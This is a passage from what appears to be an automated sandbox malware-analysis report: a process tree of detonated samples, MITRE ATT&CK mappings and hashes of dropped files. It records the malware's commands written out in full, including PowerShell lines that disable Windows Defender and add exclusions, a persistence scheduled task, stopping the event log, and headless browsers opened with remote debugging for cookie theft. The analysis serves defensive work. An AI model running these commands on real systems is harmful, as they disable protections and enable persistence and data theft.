        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1852
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5660
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3988
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4496
    - - C:\driverPerf\Umbral.exe
        
        "C:\driverPerf\Umbral.exe"
        5⤵
        
        PID:5812
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:3112
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\driverPerf\Umbral.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1268
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1524
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        6⤵
        
        PID:4432
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        6⤵
        
        PID:3136
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:3384
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3748
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:5584
    - - C:\driverPerf\123.exe
        
        "C:\driverPerf\123.exe"
        5⤵
        
        PID:5536
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5184
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:1672
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:624
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        
        PID:3748
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        
        PID:3136
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:3112
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:572
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:2364
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "TGENUFOC"
        6⤵
        Launches sc.exe
        
        PID:1444
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"
      4⤵
      Uses browser remote debugging
      PID:5500
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2c0,0x7ffd8c6ef208,0x7ffd8c6ef214,0x7ffd8c6ef220
        5⤵
        
        PID:2768
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2480,i,4281438405374665647,9679476294276566226,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2476 /prefetch:11
        5⤵
        
        PID:3068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2448,i,4281438405374665647,9679476294276566226,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2372 /prefetch:2
        5⤵
        
        PID:768
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3124,i,4281438405374665647,9679476294276566226,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3116 /prefetch:13
        5⤵
        
        PID:5928
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3612,i,4281438405374665647,9679476294276566226,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5908
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3596,i,4281438405374665647,9679476294276566226,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5412
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3764
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:5160
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2668
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        5⤵
        
        PID:936
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
      4⤵
      PID:4348
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:5384
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        5⤵
        
        PID:3584
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:2480
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd61addcf8,0x7ffd61addd04,0x7ffd61addd10
        5⤵
        
        PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"
  2⤵
  - Uses browser remote debugging
  PID:2576
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2bc,0x7ffd8c6ef208,0x7ffd8c6ef214,0x7ffd8c6ef220
    3⤵
    PID:2332
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2148,i,2662473275671606909,4416110170107004007,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2140 /prefetch:2
    3⤵
    PID:3500
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=1836,i,2662473275671606909,4416110170107004007,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:11
    3⤵
    PID:4348
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2440,i,2662473275671606909,4416110170107004007,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:13
    3⤵
    PID:5660
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3512,i,2662473275671606909,4416110170107004007,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4612
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3556,i,2662473275671606909,4416110170107004007,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3532 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:3948
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
  2⤵
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:468
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\netsh.exe
    netsh wlan show profile
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:5304
- - C:\Windows\SysWOW64\findstr.exe
    findstr All
    3⤵
    PID:1504
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
  2⤵
  PID:3608
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\netsh.exe
    netsh wlan show networks mode=bssid
    3⤵
    PID:1980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
  2⤵
  - Uses browser remote debugging
  PID:5592
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd61addcf8,0x7ffd61addd04,0x7ffd61addd10
    3⤵
    PID:4588
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2036,i,8462583253602942688,5803969984876554020,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2016 /prefetch:2
    3⤵
    PID:2876
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2032,i,8462583253602942688,5803969984876554020,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2104 /prefetch:11
    3⤵
    PID:844
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2396,i,8462583253602942688,5803969984876554020,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2408 /prefetch:13
    3⤵
    PID:6100
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,8462583253602942688,5803969984876554020,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3244 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:4616
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3276,i,8462583253602942688,5803969984876554020,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3252 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:2920
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,8462583253602942688,5803969984876554020,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4460 /prefetch:9
    3⤵
    - Uses browser remote debugging
    PID:4720
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4680,i,8462583253602942688,5803969984876554020,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4696 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:452

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:6072

C:\ProgramData\umudhokrleen\tfbrzzhhrzhb.exe
C:\ProgramData\umudhokrleen\tfbrzzhhrzhb.exe
1⤵
PID:2484
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5796
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2072
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:3116
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1512
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:5116
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4596
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2556
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:2572

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:5700
- C:\Users\Admin\AppData\Roaming\XClient.exe
  C:\Users\Admin\AppData\Roaming\XClient.exe
  2⤵
  PID:1652

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:5636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:5884
- C:\Users\Admin\AppData\Roaming\XClient.exe
  C:\Users\Admin\AppData\Roaming\XClient.exe
  2⤵
  PID:1452

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5028

C:\ProgramData\umudhokrleen\tfbrzzhhrzhb.exe
C:\ProgramData\umudhokrleen\tfbrzzhhrzhb.exe
1⤵
PID:4424
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5012
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:916
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2892
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1232
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:3400
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3000

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4812

C:\ProgramData\umudhokrleen\tfbrzzhhrzhb.exe
C:\ProgramData\umudhokrleen\tfbrzzhhrzhb.exe
1⤵
PID:1060
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2268
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4080
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1228
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2484
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:3992
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4748

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:852

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:2828

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
PID:5600

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Authentication Process

T1556

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\umudhokrleen\tfbrzzhhrzhb.exe

Filesize
3.3MB

MD5
0cd0c735d70da20e5d205b22d97e73c4

SHA1
d9da5c8717cad3515a196e4d6190fe01468ff3c5

SHA256
7dba54d964388d96704f19b2c9c76aedf2788d629a9e44214e55d87fde6a0996

SHA512
8382dd12095ad4beff1811310bf878da4b1c41732e775ea4c3c57e17f33cc052a0c150bcafe89d9a56024b1eea5d540290289d26af7188b30f8fea2f4239082d

Download Submit
C:\ProgramData\umudhokrleen\tfbrzzhhrzhb.exe

Filesize
3.2MB

MD5
5ca9114f749644f337543ee299816463

SHA1
055b16d98066bda823ddd667b376beec7ebce73f

SHA256
b004f08159efb97654dc6fe060e5c89c13d0de43237817f6291e33e5a42e2c5a

SHA512
685621a1b10f5f38bf5d6b398a23f1bb01366f5be2bc0caec2a2f9439f6bb362f00951577df03151b2de032aa9a3230aa12e68e9c7abe631705dc5dc0269dbd8

Download Submit
C:\RuntimeBroker\1.exe

Filesize
74KB

MD5
7d6645c7487e43e8cb15f5cb876018d9

SHA1
eb395ae8e4c2807ef780f488c128badc19088514

SHA256
b4c58e2243e520d5426a348ff9feef84f0f1194a5d64e3b7623b2acb9ef56edc

SHA512
bb520ae1ba7e73758d36ea2821b410da0963f4214104fa9481a7cf92e928f76e6462b4fc0f0b35a8a92bf658cd1b10ec9ba5e96fd4f4ad5f355c7ebf2cc158b4

Download Submit
C:\RuntimeBroker\16dCsj2KS342E9po.vbe

Filesize
222B

MD5
c634cfc90dbc8afdd1f10a134f0a82d2

SHA1
18634627ed6593fe5802d261394fee40daf9bfe3

SHA256
cf913ab3509f80ab8bb2b3d41bb8241659f14deefcdef2aa83df5109a6c22eb8

SHA512
434c955cc7ec7c4b461ba77a55410a23ce9fd82724bfbf285161753482b4eb94eccd34e929511c8332901cd22c24c95f89c403b34f6cd7c48f5639100f6bd077

Download Submit
C:\RuntimeBroker\2.exe

Filesize
3.7MB

MD5
9d4f869799a0623e7fbe0cd7d549cc45

SHA1
8d151369a09c05f0be8578e2f4606950ac76c42c

SHA256
05dcb34670ef70c3081745364777aa8b19571ad3d6f02077e4bea2ad7efc5fa9

SHA512
2c93de314fe47912d3d06cb8efae672a5f6827d75740945c868f3d8d7cc23dfd4409fcd964bcf4c31fb4b3f0f16ff52e3ad1dbafef4135eaa00181db5cb8dcb7

Download Submit
C:\RuntimeBroker\2.exe

Filesize
3.3MB

MD5
6dec7be73416234a4e830b18e0677a18

SHA1
af0223eb30077e3f8b8007ba913dcf2dad56e837

SHA256
